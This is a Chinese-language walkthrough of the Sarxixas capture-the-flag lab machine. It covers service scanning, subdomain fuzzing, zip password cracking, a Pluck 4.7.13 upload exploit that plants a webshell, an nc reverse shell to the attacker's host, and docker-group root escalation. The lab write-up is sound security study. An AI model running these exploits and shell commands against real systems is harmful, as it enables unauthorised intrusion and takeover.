TheHackersLabs-Sarxixas靶机详解WP
城南花已开 Lv5

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.144 08:00:27:18:5a:d3 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
export ip=192.168.60.144
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.144:22
Open 192.168.60.144:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 13:03 CST
Initiating ARP Ping Scan at 13:03
Scanning 192.168.60.144 [1 port]
Completed ARP Ping Scan at 13:03, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:03
Completed Parallel DNS resolution of 1 host. at 13:03, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:03
Scanning 192.168.60.144 [2 ports]
Discovered open port 80/tcp on 192.168.60.144
Discovered open port 22/tcp on 192.168.60.144
Completed SYN Stealth Scan at 13:03, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.144
Host is up, received arp-response (0.00035s latency).
Scanned at 2025-01-08 13:03:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:18:5A:D3 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

浏览器访问一下,右下角可以访问admin页面

image

可以看到版本为4.7.13

image

在此之前我们需要编辑hosts文件,将域名添加一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
sudo vim /etc/hosts
❯ curl 192.168.60.144/login.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>pluck 4.7.13 - entrar</title>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<link href="data/styleadmin.css" rel="stylesheet" type="text/css" media="screen" /><link rel="icon" type="image/vnd.microsoft.icon" href="data/image/favicon.ico" />
<meta name="robots" content="noindex" />
<script type="text/javascript">
function refresh() {
window.location.reload(false);
}
</script>
</head>

<body>
<div id="menuheader">
<h1>pluck</h1>
<ul id="menu2">
<li>entrar</li>
</ul>
</div>
<div id="content"> <span class="kop2">contraseña</span>
<form action="" method="post">
<input name="cont1" size="25" type="password" />
<input type="text" name="bogus" style="display: none;" />
<input type="submit" name="submit" value="Entrar" />
</form>
<div id="copyright"><a href="http://www.pluck-cms.org" target="_blank">pluck 4.7.13</a> © 2005-2025. pluck se ofrece bajo los términos de <a href="http://www.gnu.org/licenses/gpl.html" target="_blank">GNU Licencia Pública General</a>.</div>
</div>
</body>
</html>

模糊测试子域名

利用wfuzz模糊测试一下,搜寻子域名

发现有个api的子域名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ wfuzz -c -u "http://sarxixas.thl" -H "HOST:FUZZ.sarxixas.thl" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hc 302
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://sarxixas.thl/
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

省略400返回值……
000000984: 200 15 L 51 W 776 Ch "api - api"

再次编辑hosts

访问发现有个压缩包,down到本地

image

压缩包加密了,爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
cd Downloads
ls
Cocineros hash HostiaPilotes.zip
❯ zip2john HostiaPilotes.zip >hash
ver 1.0 HostiaPilotes.zip/HostiaPilotes/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 HostiaPilotes.zip/HostiaPilotes/contraseña.txt PKZIP Encr: 2b chk, TS_chk, cmplen=31, decmplen=19, crc=DF1DBE40 ts=69C0 cs=69c0 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
babybaby (HostiaPilotes.zip/HostiaPilotes/contraseña.txt)
1g 0:00:00:00 DONE (2025-01-08 14:04) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

拿到密码解压一下

1
2
3
4
5
6
7
8
❯ unzip HostiaPilotes.zip
Archive: HostiaPilotes.zip
creating: HostiaPilotes/
[HostiaPilotes.zip] HostiaPilotes/contraseña.txt password:
password incorrect--reenter:
extracting: HostiaPilotes/contraseña.txt
cat HostiaPilotes/contraseña.txt
ElAbueloDeLaAnitta

拿着密码ElAbueloDeLaAnitta,登入一下这个CMS

POC利用

搜寻一下,在此版本中有文件上传远程执行漏洞

image

脚本利用一下

1
2
3
4
5
❯ python3 49909.py 192.168.60.144 80 ElAbueloDeLaAnitta /

Authentification was succesfull, uploading webshell

Uploaded Webshell to: http://192.168.60.144:80//files/shell.phar

访问这个webshell

哇塞,这个poc还能生成一个类似终端的页面,厉害了😀

image

用户提权

反弹一个shell到Kali好操作一点

opt下有个压缩包,down到本地

1
2
3
4
5
6
7
8
9
10
11
12
13
p0wny@shell:…/html/files# nc -c sh 192.168.60.100 4444
---------分隔
❯ pwncat-cs -lp 4444
[14:12:56] Welcome to pwncat 🐈! __main__.py:164
[14:13:02] received connection from 192.168.60.144:34018 bind.py:84
[14:13:03] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[14:13:04] 192.168.60.144:34018: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@sarxixas:/var/www/html/files$
(remote) www-data@sarxixas:/opt$
(local) pwncat$ download edropedropedrooo.zip
edropedropedrooo.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 242/242 bytes • ? • 0:00:00
[14:14:14] downloaded 242.00B in 0.15 seconds

我都不用打开压缩包,盲猜就是加密的

拿到密码cassandra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ zip2john edropedropedrooo.zip >hash
ver 1.0 efh 5455 efh 7875 edropedropedrooo.zip/pedropedropedrooo.txt PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=D30B822E ts=8F24 cs=8f24 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra (edropedropedrooo.zip/pedropedropedrooo.txt)
1g 0:00:00:00 DONE (2025-01-08 14:15) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ unzip edropedropedrooo.zip
Archive: edropedropedrooo.zip
[edropedropedrooo.zip] pedropedropedrooo.txt password:
extracting: pedropedropedrooo.txt
cat pedropedropedrooo.txt
3HBRD7XyxF5gAbkMmnWdW

解压后打开文本,猜测是用户 sarxixa密码

尝试后,哎呀好像是连不上

1
2
3
4
❯ pwncat-cs  sarxixa@192.168.60.144
[14:17:17] Welcome to pwncat 🐈! __main__.py:164
Password: *********************
[14:17:26] connection failed: ssh authentication failed: Authentication failed.

看着文本像base64编码后的,但又不完全像

放到Cyberchef解码一下,哦哦,是base58编码

image

得到新密码Quepasaolvidona

尼玛,怎么还不行啊😅

我看了下其他师傅的WP,发现有个小细节

压缩包名为edropedropedrooo.zip而解压后的文件名为pedropedropedrooo.txt

两者只差开头的一个P

尝试删除密码开头的Q,得到真正的密码uepasaolvidona

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ pwncat-cs  sarxixa@192.168.60.144
[14:24:22] Welcome to pwncat 🐈! __main__.py:164
Password: **************
[14:24:29] 192.168.60.144:22: normalizing shell path manager.py:957
192.168.60.144:22: registered new host w/ db manager.py:957
(local) pwncat$

(remote) sarxixa@sarxixas:/home/sarxixa$ cat user.txt
cat: user.txt: Permiso denegado
(remote) sarxixa@sarxixas:/home/sarxixa$ ls -al
total 28
drwx------ 3 sarxixa sarxixa 4096 abr 30 2024 .
drwxr-xr-x 3 root root 4096 abr 30 2024 ..
lrwxrwxrwx 1 root root 9 abr 30 2024 .bash_history -> /dev/null
-rw-r--r-- 1 sarxixa sarxixa 220 abr 12 2024 .bash_logout
-rw-r--r-- 1 sarxixa sarxixa 3526 abr 12 2024 .bashrc
drwxr-xr-x 3 sarxixa sarxixa 4096 abr 30 2024 .local
-rw-r--r-- 1 sarxixa sarxixa 807 abr 12 2024 .profile
-r-------- 1 root root 33 abr 30 2024 user.txt
(remote) sarxixa@sarxixas:/home/sarxixa$ sudo -l
-bash: sudo: orden no encontrada
(remote) sarxixa@sarxixas:/home/sarxixa$ getcap -r /
/usr/bin/ping cap_net_raw=ep

user没法读,没有sudo权限也没有其他什么能力

Root提权

好像这个用户在docker组中

1
2
3
4
5
(remote) sarxixa@sarxixas:/home/sarxixa$ cat /etc/group
root:x:0:
省略……………………
docker:x:1001:sarxixa
sarxixa:x:1002:

尝试利用docker提权,直接拿下

1
2
3
4
5
6
7
8
9
10
11
12
(remote) sarxixa@sarxixas:/home/sarxixa$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
245043d9199c: Pull complete
Digest: sha256:b97e2a89d0b9e4011bb88c02ddf01c544b8c781acf1f4d559e7c8f12f1047ac3
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
e84b0c633b9749b00eace3483a09c49c
# cat /home/sarxixa/user.txt
d7a4cf4ac8cbabd2adcfde5b883ecf06

这个方案要是换在以前的网络环境,我靶机是不出网的,还有dockerhub是没法访问的,现在clash开TUN模式,速度嘎嘎快🛫

由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k